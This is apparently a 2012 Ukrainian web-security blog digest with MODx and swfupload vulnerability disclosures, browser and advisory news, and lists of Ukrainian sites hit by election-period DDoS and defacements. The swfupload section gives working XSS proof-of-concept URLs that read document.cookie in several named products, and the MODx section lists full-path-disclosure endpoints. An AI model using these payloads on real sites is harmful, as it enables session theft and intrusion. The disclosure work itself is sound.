Websecurity - Веб безпека

27.06.2012

У травні, 18.05.2012, під час пентесту, я виявив багато уразливостей в системі MODx, зокрема Brute Force та Full path disclosure. Це перша порція уразливостей в MODx. Про що найближчим часом повідомлю розробникам системи.

Раніше я вже писав про уразливості в Tagcloud для MODx CMS та JWPlayer для MODx.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам.

17.11.2012

Brute Force (WASC-11):

В формі логіна (http://site/manager/) немає надійного захисту від Brute Force атак.

При цьому зустрічаються сайти, де є такий захист як блокування після багатьох невдалих спроб логіну. Але цей захист неефективний - пароль може бути підібраний ще до спрацювання блокування (як це було під час мого пентесту), блокування працює короткий час і воно працює лише для конкретного акаунту, тобто можна підбирати паролі для інших незаблокованих акаунтів.

Full path disclosure (WASC-13):

http://site/assets/cache/siteCache.idx.php
http://site/assets/plugins/ckeditor/read_config.php
http://site/assets/plugins/managermanager/default.mm_rules.inc.php
http://site/assets/plugins/managermanager/example.mm_rules.inc.php
http://site/assets/plugins/managermanager/mm.inc.php
http://site/assets/plugins/phx/modifiers/parent.phx.php
http://site/assets/snippets/ditto/classes/debug.class.inc.php
http://site/assets/snippets/ditto/extenders/tagging.extender.inc.php
http://site/assets/snippets/ditto/formats/atom.format.inc.php
http://site/assets/snippets/ditto/formats/json.format.inc.php
http://site/assets/snippets/ditto/formats/rss.format.inc.php
http://site/assets/snippets/ditto/formats/xml.format.inc.php
http://site/manager/includes/browsercheck.inc.php
http://site/manager/includes/mutate_settings.ajax.php
http://site/manager/includes/rss.inc.php
http://site/manager/includes/extenders/getUserData.extender.php
http://site/manager/includes/sniff/phpSniff.class.php
http://site/manager/media/browser/mcpuk/connectors/php/Commands/Thumbnail.php

Деякі з FPD відносяться до движка, а деякі до плагінів для нього.

Уразливі MODx 1.0.6 та попередні версії.

У листопаді, 06.11.2012, через півтора місяці після виходу Google Chrome 22, вийшов Google Chrome 23.

В браузері зроблено декілька нововведень та виправлені помилки. А також виправлено 14 уразливостей, з яких 6 позначені як небезпечні, 7 - помірні і 1 - незначні. З уразливостей, що мають статус небезпечних, дві проблеми викликані помилками драйверів для платформи Mac OS X, дві проблеми пов’язані зі звертанням до звільненого блоку пам’яті в обробнику SVG-фільтрів і в коді виведення відео, одна проблема пов’язана з виходом за припустимі границі пам’яті в коді обробки текстур і одна проблема виявлена в движку v8.

Чимало з виправлених уразливостей виявлені за допомогою інструментарію address-sanitizer, призначеного для автоматизованого визначення фактів звертання до звільнених областей пам’яті, виходу за межі границь виділеного буфера і деяких інших типів помилок при роботі з пам’яттю.

• Увидел свет web-браузер Chrome 23 (деталі)

В даній добірці уразливості в веб додатках:

• Oracle Business Transaction Management Server FlashTunnelService Remote File Deletion (деталі)
• SilverStripe CMS 2.4.7 <= Arbitrary URL Redirection (деталі)
• SilverStripe CMS 2.4.7 <= Persistent Cross Site Scripting Vulnerability (деталі)
• ASTPP VoIP Billing (4cf207a) - Multiple Web Vulnerabilities (деталі)
• Off-by-one error in libxml2 (деталі)
• Knowledge Base EE v4.62.0 - SQL Injection Vulnerability (деталі)
• Multiple vulnerabilities in Ezylog photovoltaic management server (деталі)
• XSS Vulnerabilities in TaskFreak (деталі)
• Microsoft Security Bulletin MS12-058 - Critical Vulnerabilities in Microsoft Exchange Server WebReady Document Viewing Could Allow Remote Code Execution (деталі)
• XSS Vulnerabilities in CMSMini (деталі)

В жовтні, коли в Україні проводилися парламентські вибори, значно зросла хакерська активність в Уанеті. Особливо збільшилася кількість DDoS атак - в цьому плані жовтень став “кривавим”. Кількість атак у жовтні значно перевищила аналогічний сплеск DDoS атак на gov.ua сайти у лютому.

Якщо на початку року сплеск атак на сайти був пов’язаний з подіями навколо ex.ua, то цього разу всі атаки (взломи і DDoS) пов’язані з виборами до парламенту. Напередодні дня голосування і у день голосування відбулася велика кількість DDoS атак, а на деякі онлайн ЗМІ атаки продовжувалися аж до початку листопада. За повідомленнями ЗМІ, напередодні виборів хакерських атак зазнали десятки інтернет-ресурсів по всій Україні, власники двох сайтів навіть звернулися до СБУ з цього приводу.

У жовтні був взломаний наступний партійний сайт:

• regioncrimea.org - 15.10.2012

У жовтні були проведені DDoS атаки на наступні сайти:

• byut.com.ua - 17.10.2012
• frontzmin.ua - 17.10.2012
• www.tymoshenko.ua - 17.10.2012
• www.grytsenko.com.ua - 17.10.2012
• regioncrimea.org - 28.10.2012
• investigator.org.ua - 28.10.2012
• www.ipc.crimea.ua - 28.10.2012
• ipc-bigyalta.org - 28.10.2012
• ipc-feodosia.org - 28.10.2012
• ipc-evpatoria.org - 28.10.2012
• ipc-dzhankoy.org - 28.10.2012
• ipcsevastopol.org - 28.10.2012
• 911sevastopol.org - 28.10.2012
• nr2.com.ua - 28.10.2012
• www.nr2.ru - 28.10.2012
• turchynov.com - 28.10.2012
• arseniy.com.ua - 28.10.2012
• www.partyofregions.org.ua - 28.10.2012
• oporaua.org - 28.10.2012
• www.cvu.org.ua - 28.10.2012
• electua.org - 28.10.2012
• maidan.org.ua - 28.10.2012
• cvk.gov.ua - 28.10.2012
• www.president.gov.ua - 28.10.2012

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах My Question, A/B Test та Easy Webinar. Для котрих з’явилися експлоіти. My Question - це плагін для створення опитувань, A/B Test - це плагін для A/B тестування, Easy Webinar - це плагін для створення онлайн-семінарів.

• XSS in answer my question plugin (деталі)
• WordPress Abtest Directory Traversal (деталі)
• WordPress Easy Webinar Blind SQL Injection (деталі)

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

За повідомленням www.xakep.ru, Обама підписав секретну директиву по кіберзлочинності.

Президент Обама підписав секретну директиву, що дає повноваження армії більш ефективно й агресивно відповідати на кібератаки проти державних і приватних мереж США.

Директива №20 (Presidential Policy Directive 20) підписана президентом у середині жовтня, вона встановлює широкий і конкретний перелік атакуючих дій, які можна застосовувати проти іноземних кіберагресорів, при сприянні федеральним агентствам. Ця директива повинна покласти кінець багаторічним суперечкам серед державних відомств про те, які повноваження маються в кожного з них при проведенні операцій за кордоном США.

За повідомленням ipress.ua, СБУ порушила 2 кримінальні справи через хакерські атаки під час виборів.

Служба безпеки України порушила дві кримінальні справи за частиною 1 статті 361 КК (незаконне втручання в роботу комп’ютерів, систем та мереж) за фактами DDoS-атак на сайти у жовтні 2012 року.

За словами прес-секретаря СБУ, у Службу безпеки із заявами про такі атаки звернулися всього дві особи - голова уряду АР Крим Анатолій Могильов (з факту атаки на сторінку Кримської регіональної організації Партії регіонів) і керівник Центру журналістських розслідувань Валентина Самар (атака на сайт Центру). При цьому, за повідомленнями ЗМІ, напередодні виборів хакерських атак зазнали десятки інших інтернет-ресурсів по всій Україні.

За повідомленням www.xakep.ru, Google Docs зберігає “видалені” документи користувачів з 2007 року.

Тільки недавно стих скандал з Facebook, що при видаленні користувацьких фотографій просто позначав їх як “видалені” і продовжував зберігати на серверах. До деяких фотографій могли навіть одержати доступ сторонні особи, якщо знали URL. І от зараз виявилося, що схожий баг ніяк не усуне Google на своєму сервісі Google Docs.

Німецький програміст Ральф Шарнецки у далекому 2007 році привів докази, що документи: а) зберігаються на хостингу Google Docs після того, як користувач очистив кошик; б) частини документів доступні стороннім особам.

Ця проблема повністю не вирішена й досі (всі документи створені до 2009 року, потенційно ніколи не будуть видалені й будуть доступні необмежений час). Що яскраво демонструє справжнє відношення Гугла до безпеки і приватності.

Продовжуючи розпочату традицію, після попереднього відео про URL Spoofing в Opera, пропоную нове відео на веб секюріті тематику. Цього разу відео про Denial of Service в Internet Explorer. Рекомендую подивитися всім хто цікавиться цією темою.

Internet Explorer CSS Denial of Service Vulnerability

В ролику демонструється Denial of Service уразливість в браузері Microsoft Internet Explorer. Яка пов’язана з обробкою CSS в браузері.

Атака відбувається при відвідуванні в IE спеціально створеного веб сайта, що містить код експлоіту. Рекомендую подивитися дане відео для розуміння векторів атак на браузери.

Виявлений обліковий запис за замовчуванням в Apache Cloudstack.

Уразливі продукти: Apache Cloudstack, Citrix Cloud.com CloudStack.

Обліковий запис за замовчуванням з відомим паролем.

• CloudStack configuration vulnerability (деталі)

15.11.2012

Раніше я писав про XSS уразливість в Dotclear, XenForo, InstantCMS, AionWeb, Dolphin (в swfupload) і ця дірка має місце в багатьох інших веб додатках.

Якщо в попередньому записі я писав про веб додатки з swfupload.swf (який призначений для Flash Player 10), то зараз я напишу про веб додатки з swfupload_f9.swf (який призначений для Flash Player 9). Зокрема я виявив дану Cross-Site Scripting уразливість в AionWeb, ExpressionEngine, Liferay Portal (Community Edition, який раніше називався Standard Edition, і Enterprise Edition), SurgeMail, symfony - серед багатьох веб додатків, що постачаються з swfupload_f9.swf.

XSS:

AionWeb:

http://site/engine/classes/swfupload/swfupload.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//
http://site/engine/classes/swfupload/swfupload_f9.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//

В AionWeb присутні обидві версії флеш додатку (а також версія для Flash Player 8, про яку я напишу згодом).

ExpressionEngine:

http://site/cms/themes/cp_themes/default/images/swfupload_f9.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//

Liferay Portal:

http://site/html/js/misc/swfupload/swfupload_f9.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//

SurgeMail:

http://site/surgemail/mtemp/surgeweb/tpl/shared/modules/swfupload.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//
http://site/surgemail/mtemp/surgeweb/tpl/shared/modules/swfupload_f9.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//

В SurgeMail присутні обидві версії флеш додатку (а також версія для Flash Player 8, про яку я напишу згодом).

symfony:

http://site/plugins/sfSWFUploadPlugin/web/sfSWFUploadPlugin/swf/swfupload_f9.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//

Уразливі потенційно всі версії AionWeb, ExpressionEngine, Liferay Portal (Community Edition, який раніше називався Standard Edition, і Enterprise Edition), SurgeMail, symfony (при цьому 20.04.2012 дана уразливість була виправлена в WordPress 3.3.2).

Розробники WP випустили оновлену версію флешки (те саме зробили розробники XenForo), яку могли використати всі веб розробники, що використовують swfupload.

06.12.2012

Замінив Magento на ExpressionEngine, т.к. я виявив, що уразливим є саме цей движок. На сайті, де я знайшов флешку, був встановлений Magento. Але сьогодні я виявив, що на цьому сайті також встановлений EE, а також EE використовується на інших сайтах з аналогічною темою (в якій знаходиться swf-файл).

Після попереднього дослідження похаканих сайтів, приведу нову інформацію про взломані сайти. З числа українських сайтів.

• http://yalta-gs.gov.ua (хакером NeT-DeViL) - 26.08.2012 - похаканий державний сайт, зараз сайт вже виправлений адмінами
• http://grid.nas.gov.ua (хакером NeT-DeViL) - 26.08.2012 - похаканий державний сайт, зараз сайт вже виправлений адмінами
• http://sumy-city.upszn-sumy.gov.ua (хакером ArTiN) - 31.08.2012 - похаканий державний сайт, зараз сайт вже виправлений адмінами
• http://blog.web2.com.ua (хакером systemroot)
• http://klyaksa-fan.com (хакером x-c0d3r) - 06.11.2012, зараз сайт вже виправлений адмінами